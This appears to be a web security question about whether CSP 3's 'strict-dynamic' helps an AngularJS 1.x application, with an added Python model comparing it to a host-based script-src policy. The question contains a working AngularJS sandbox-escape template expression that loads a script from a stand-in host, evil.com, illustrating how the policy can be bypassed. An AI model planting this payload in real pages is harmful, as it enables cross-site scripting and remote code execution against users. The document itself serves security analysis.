I do not see the point in using CSP 3's new strict-dynamic in the case of an AngularJS 1.x application. As far as I can tell, using strict-dynamic still allows arbitrary JavaScript injection via a sandbox escape in a template:
<html>
<head>
<title>Angular - Alert in Expression</title>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.5.8/angular.min.js"></script>
</head>
<body ng-app="" ng-csp>
<div>{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,a=document.createElement("script"),a.src="https://evil.com/evil.js",a.type="text/javascript",a=document.getElementsByTagName("head")[0].appendChild(a),a')}}</div>
</body>
</html>
The worst thing is, the script injection above is allowed by strict-dynamic, whereas a reasonable host-based CSP script-src would block it.
So, is there any reason to use strict-dynamic on an application that uses AngularJS?
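To make the difference between the two policies concrete, here is an added example (not part of the original question) that models the CSP script-src decision in simplified form and runs both policies against the scenario described above: a framework script loaded from ajax.googleapis.com, which then creates a new script element via the DOM and points it at a third-party origin. The policy strings, the page origin, the nonce value and the third-party origin are constructed for illustration; the matching logic is a reduced version of the CSP3 rules (exact-origin host matching, single script-src directive, no hashes or wildcards).

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class ScriptRequest:
    """A script the browser is about to execute (constructed model, not a real DOM object)."""
    origin: str                       # scheme://host the script is fetched from
    nonce: Optional[str] = None       # nonce attribute on the <script> element, if any
    parser_inserted: bool = True      # False for elements created via createElement/appendChild
    created_by_trusted: bool = False  # True if an already-allowed script created the element


def parse_script_src(header: str) -> list:
    """Return the source list of the script-src directive (assumes one script-src per header)."""
    for directive in header.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "script-src":
            return parts[1:]
    return []


def script_allowed(header: str, req: ScriptRequest, page_origin: str) -> bool:
    """Simplified CSP3 script-src check; returns True if the script would run."""
    sources = parse_script_src(header)
    strict_dynamic = "'strict-dynamic'" in sources
    nonces = {s[len("'nonce-"):-1] for s in sources if s.startswith("'nonce-")}

    # A matching nonce allows the script under both policy styles.
    if req.nonce is not None and req.nonce in nonces:
        return True

    if strict_dynamic:
        # With 'strict-dynamic', host-source, scheme-source, 'self' and 'unsafe-inline'
        # are ignored. Trust propagates to non-parser-inserted scripts created by an
        # already-trusted script; parser-inserted scripts still need a nonce or hash.
        return (not req.parser_inserted) and req.created_by_trusted

    # Host-based allowlist (simplified to exact origin match plus 'self').
    for s in sources:
        if s == "'self'" and req.origin == page_origin:
            return True
        if not s.startswith("'") and s == req.origin:
            return True
    return False


# Constructed scenario values (hypothetical origins and nonce).
PAGE_ORIGIN = "https://app.example"
NONCE = "r4nd0mN0nc3"
HOST_POLICY = "script-src https://ajax.googleapis.com"
STRICT_POLICY = f"script-src 'nonce-{NONCE}' 'strict-dynamic'"


def framework_script(nonce: Optional[str] = None) -> ScriptRequest:
    """The <script src="https://ajax.googleapis.com/..."> tag written into the page markup."""
    return ScriptRequest(origin="https://ajax.googleapis.com", nonce=nonce, parser_inserted=True)


def dom_created_script() -> ScriptRequest:
    """A <script> the framework (already trusted) creates at runtime and points at another origin."""
    return ScriptRequest(origin="https://third-party.example",
                         parser_inserted=False, created_by_trusted=True)


def compare_policies() -> dict:
    """Evaluate both policies against the framework script and the DOM-created script."""
    return {
        "host_based": {
            "framework": script_allowed(HOST_POLICY, framework_script(), PAGE_ORIGIN),
            "dom_created": script_allowed(HOST_POLICY, dom_created_script(), PAGE_ORIGIN),
        },
        "strict_dynamic": {
            "framework": script_allowed(STRICT_POLICY, framework_script(NONCE), PAGE_ORIGIN),
            "dom_created": script_allowed(STRICT_POLICY, dom_created_script(), PAGE_ORIGIN),
        },
    }


if __name__ == "__main__":
    for policy, result in compare_policies().items():
        print(policy, result)
```

Running it shows the asymmetry the question is about: the host-based policy blocks the DOM-created script because its origin is not on the allowlist, while under 'strict-dynamic' the same script is allowed because a nonce-trusted script created it and host allowlists are no longer consulted. The model also shows the other side of the trade: under 'strict-dynamic' a parser-inserted script with no nonce is blocked regardless of its host, which is the property that makes a template-injection-free page hard to attack with markup injection alone.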